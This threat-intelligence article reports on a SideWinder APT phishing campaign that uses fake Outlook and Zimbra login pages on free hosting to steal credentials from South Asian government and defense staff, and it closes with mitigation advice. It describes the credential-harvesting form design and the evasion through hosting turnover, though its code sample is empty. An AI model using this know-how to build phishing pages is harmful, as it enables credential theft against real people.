The SideWinder Advanced Persistent Threat (APT) group, a state-sponsored entity with a history of cyber espionage in South Asia, has initiated a sophisticated phishing campaign. This operation involves the creation of counterfeit Outlook and Zimbra webmail portals designed to steal login credentials from government and military personnel in countries such as Pakistan, Nepal, Sri Lanka, Bangladesh, and Myanmar.
Tactics and Techniques
Since mid-2025, SideWinder has been leveraging free hosting services like Netlify, pages.dev, and workers.dev to deploy these fraudulent login pages. The group employs maritime and defense-themed lure documents to entice targets into entering their credentials. These documents often masquerade as official communications, increasing the likelihood of successful deception.
For instance, in August 2025, Hunt.io’s telemetry detected a rapid turnover of phishing domains, with new sites emerging every three to five days. Many of these sites impersonated the Directorate General of Defense Purchases (DGDP) in Bangladesh, presenting Secured File portals that prompted users to input their email credentials under the pretense of accessing information about Turkish defense equipment.
Similarly, staff members of Nepal’s Ministry of Finance received invitations to view PDF documents titled सम्माननीय प्रधानमन्त्रीज्यूको चीन भ्रमण सम्बन्धमा.pdf, which redirected them to a counterfeit Outlook login page hosted on Netlify. This page was meticulously crafted to resemble legitimate login portals, thereby increasing the likelihood of credential theft.
Credential Harvesting Mechanism
The fake portals are designed to collect user credentials through direct form submissions to servers controlled by the attackers. A typical phishing page targeting the Space and Upper Atmosphere Research Commission (SUPARCO) included a form that posted captured credentials to a specific endpoint:
“`html
“`
In this setup, the hidden `inbox` field contains a Base64-encoded email address, allowing the attackers to associate stolen credentials with specific campaigns. Once obtained, these credentials can be used to infiltrate restricted networks or to deploy additional malware from open directories hosted on various IP addresses.
Operational Security and Evasion
By utilizing reputable hosting platforms, SideWinder effectively evades basic domain-based blocking mechanisms. The group’s rapid deployment and turnover of phishing sites further complicate detection and mitigation efforts. This strategy underscores the importance of continuous monitoring and advanced filtering techniques to identify and neutralize such threats.
Recommendations for Mitigation
To counteract these sophisticated phishing campaigns, organizations should implement the following measures:
1. Continuous Monitoring: Regularly monitor free hosting domains for signs of malicious activity.
2. Advanced Filtering: Deploy advanced filtering of form POST requests to unknown servers to detect and block unauthorized data transmissions.
3. User Education: Conduct comprehensive training programs to help users recognize phishing attempts, especially those involving document-based lures linked to login prompts.
4. Network Segmentation: Implement network segmentation to limit the potential impact of a successful intrusion.
5. Multi-Factor Authentication (MFA): Enforce the use of MFA to add an additional layer of security, making it more difficult for attackers to gain unauthorized access even if credentials are compromised.
By adopting these strategies, organizations can enhance their resilience against credential-based intrusions and mitigate the risks associated with sophisticated phishing campaigns like those orchestrated by the SideWinder group.
